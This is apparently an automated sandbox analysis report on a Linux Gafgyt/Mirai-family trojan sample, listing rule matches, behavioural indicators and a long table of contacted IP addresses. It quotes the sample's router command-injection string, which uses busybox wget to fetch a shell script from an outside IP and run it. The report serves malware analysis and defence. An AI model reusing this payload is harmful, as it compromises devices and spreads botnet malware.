Source: Process Memory Space: WU3D24p3h0.elf PID: 6214, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0[scanner] FD%d error while connecting = %d
Source: classification engine Classification label: mal76.troj.linELF@0/0@0/0

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46938
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46944
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46946
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46956
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46958
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46968
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46970
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46974
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46978
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46986
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46988
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46998
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47004
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47016
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47026
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/WU3D24p3h0.elf (PID: 6208) Queries kernel information via 'uname': Jump to behavior
Source: WU3D24p3h0.elf, 6208.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.000056225bdcc000.000056225be31000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sparc
Source: WU3D24p3h0.elf, 6208.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.000056225bdcc000.000056225be31000.rw-.sdmp Binary or memory string: ["V!/etc/qemu-binfmt/sparc
Source: WU3D24p3h0.elf, 6208.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/WU3D24p3h0.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/WU3D24p3h0.elf
Source: WU3D24p3h0.elf, 6208.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sparc

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
181.213.69.198
 unknown Brazil
28573 CLAROSABR false
42.173.108.86
 unknown China
4249 LILLY-ASUS false
181.25.114.216
 unknown Argentina
22927 TelefonicadeArgentinaAR false
119.36.189.61
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
118.28.46.59
 unknown China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa false
35.143.146.223
 unknown United States
33363 BHN-33363US false
103.75.50.131
 unknown Indonesia
135476 BTPN-AS-IDPTBankTabunganPensiunanNasionalTbkID false
5.239.215.218
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR false
147.99.53.18
 unknown France
2200 FR-RENATERReseauNationaldetelecommunicationspourlaTec false
8.126.41.39
 unknown United States
3356 LEVEL3US false
94.78.81.212
 unknown Turkey
44558 NETONLINETR false
213.226.6.114
 unknown Bulgaria
8717 SPECTRUMNETBG false
209.77.22.199
 unknown United States
7132 SBIS-ASUS false
119.62.24.121
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
44.221.119.221
 unknown United States
14618 AMAZON-AESUS false
13.78.147.177
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
178.92.125.229
 unknown Ukraine
6849 UKRTELNETUA false
113.134.51.33
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
101.182.144.65
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
178.157.234.72
 unknown Denmark
43557 ASEMNETDK false
181.61.167.37
 unknown Colombia
10620 TelmexColombiaSACO false
78.234.153.60
 unknown France
12322 PROXADFR false
178.241.199.70
 unknown Turkey
16135 TURKCELL-ASTurkcellASTR false
195.100.23.198
 unknown Sweden
5400 BTGB false
212.176.121.206
 unknown Russian Federation
2854 ROSPRINT-ASRU false
101.68.23.18
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
2.94.9.4
 unknown Russian Federation
8402 CORBINA-ASOJSCVimpelcomRU false
181.210.230.108
 unknown Honduras
7727 HondutelHN false
119.20.47.193
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
62.40.187.78
 unknown Austria
8339 KABSI-ASAT false
62.167.11.189
 unknown Switzerland
6730 SUNRISECH false
109.48.129.152
 unknown Portugal
2860 NOS_COMUNICACOESPT false
101.38.42.128
 unknown China
4808 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN false
71.165.183.160
 unknown United States
5650 FRONTIER-FRTRUS false
2.235.31.116
 unknown Italy
12874 FASTWEBIT false
181.240.78.152
 unknown Colombia
26611 COMCELSACO false
144.139.127.200
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
181.101.56.113
 unknown Argentina
7303 TelecomArgentinaSAAR false
68.192.29.11
 unknown United States
6128 CABLE-NET-1US false
62.92.203.139
 unknown Norway
2119 TELENOR-NEXTELTelenorNorgeASNO false
212.250.45.83
 unknown United Kingdom
5089 NTLGB false
94.116.117.164
 unknown United Kingdom
41012 THECLOUDGB false
178.7.142.57
 unknown Germany
3209 VODANETInternationalIP-BackboneofVodafoneDE false
213.166.86.41
 unknown Netherlands
207083 HOSTSLIM-GLOBAL-NETWORKNL false
62.243.140.215
 unknown Denmark
3292 TDCTDCASDK false
178.237.239.1
 unknown Spain
15704 AS15704ES false
96.122.214.25
 unknown United States
7922 COMCAST-7922US false
178.78.83.195
 unknown United Kingdom
12390 KINGSTON-UK-ASGB false
170.121.251.185
 unknown United States
17190 WMATAUS false
119.125.153.201
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
113.178.195.31
 unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN false
178.197.159.194
 unknown Switzerland
3303 SWISSCOMSwisscomSwitzerlandLtdCH false
119.138.141.31
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
181.104.232.159
 unknown Argentina
6147 TelefonicadelPeruSAAPE false
178.103.83.109
 unknown United Kingdom
12576 EELtdGB false
164.58.177.215
 unknown United States
5078 ONENET-AS-1US false
170.137.218.44
 unknown United States
11685 HNBCOL-ASUS false
178.118.172.215
 unknown Belgium
6848 TELENET-ASBE false
181.204.131.198
 unknown Colombia
27831 ColombiaMovilCO false
124.17.106.89
 unknown China
7497 CSTNET-AS-APComputerNetworkInformationCenterCN false
213.65.51.93
 unknown Sweden
3301 TELIANET-SWEDENTeliaCompanySE false
178.190.31.117
 unknown Austria
8447 TELEKOM-ATA1TelekomAustriaAGAT false
170.115.239.241
 unknown United States
11205 CITY-OF-PHILADELPHIAUS false
37.71.187.7
 unknown France
15557 LDCOMNETFR false
181.168.62.222
 unknown Argentina
10318 TelecomArgentinaSAAR false
62.114.184.230
 unknown Egypt
36992 ETISALAT-MISREG false
181.216.128.147
 unknown Brazil
21826 CorporacionTelemicCAVE false
181.163.84.112
 unknown Chile
7418 TELEFONICACHILESACL false
2.144.95.120
 unknown Iran (ISLAMIC Republic Of)
44244 IRANCELL-ASIR false
178.222.54.130
 unknown Serbia
8400 TELEKOM-ASRS false
181.221.212.86
 unknown Brazil
28573 CLAROSABR false
178.62.131.197
 unknown European Union
14061 DIGITALOCEAN-ASNUS false
213.191.91.14
 unknown Germany
6805 TDDE-ASN1DE false
166.171.249.232
 unknown United States
20057 ATT-MOBILITY-LLC-AS20057US false
195.12.132.202
 unknown Slovakia (SLOVAK Republic)
16160 SWANBratislavaSlovakiaSK false
128.153.194.138
 unknown United States
92 CLARKSON-ASUS false
213.185.75.236
 unknown Germany
9063 SAARGATE-ASVSENETGmbHDE false
181.248.238.45
 unknown Colombia
26611 COMCELSACO false
178.14.227.140
 unknown Germany
3209 VODANETInternationalIP-BackboneofVodafoneDE false
181.103.242.215
 unknown Argentina
7303 TelecomArgentinaSAAR false
181.103.242.216
 unknown Argentina
7303 TelecomArgentinaSAAR false
181.159.27.107
 unknown Colombia
26611 COMCELSACO false
213.115.153.142
 unknown Sweden
2119 TELENOR-NEXTELTelenorNorgeASNO false
181.175.43.26
 unknown Ecuador
14522 SatnetEC false
93.208.46.137
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
181.86.228.149
 unknown Argentina
7303 TelecomArgentinaSAAR false
181.122.188.248
 unknown Paraguay
23201 TelecelSAPY false
46.78.19.153
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
181.19.238.245
 unknown Venezuela
27889 TelecomunicacionesMOVILNETVE false
213.110.25.94
 unknown Russian Federation
49483 SKATISPRU false
193.182.93.33
 unknown Sweden
197623 KOPINGS-KABEL-TVSE false
170.115.152.153
 unknown United States
11205 CITY-OF-PHILADELPHIAUS false
62.168.37.189
 unknown Czech Republic
5588 GTSCEGTSCentralEuropeAntelGermanyCZ false
2.129.249.243
 unknown Denmark
9158 TELENOR_DANMARK_ASDK false
62.242.237.67
 unknown Denmark
3292 TDCTDCASDK false
178.204.209.221
 unknown Russian Federation
28840 TATTELECOM-ASRU false
94.37.96.14
 unknown Italy
8612 TISCALI-IT false
213.7.29.117
 unknown Cyprus
6866 CYTA-NETWORKInternetServicesCY false
178.45.195.212
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
170.115.239.214
 unknown United States
11205 CITY-OF-PHILADELPHIAUS false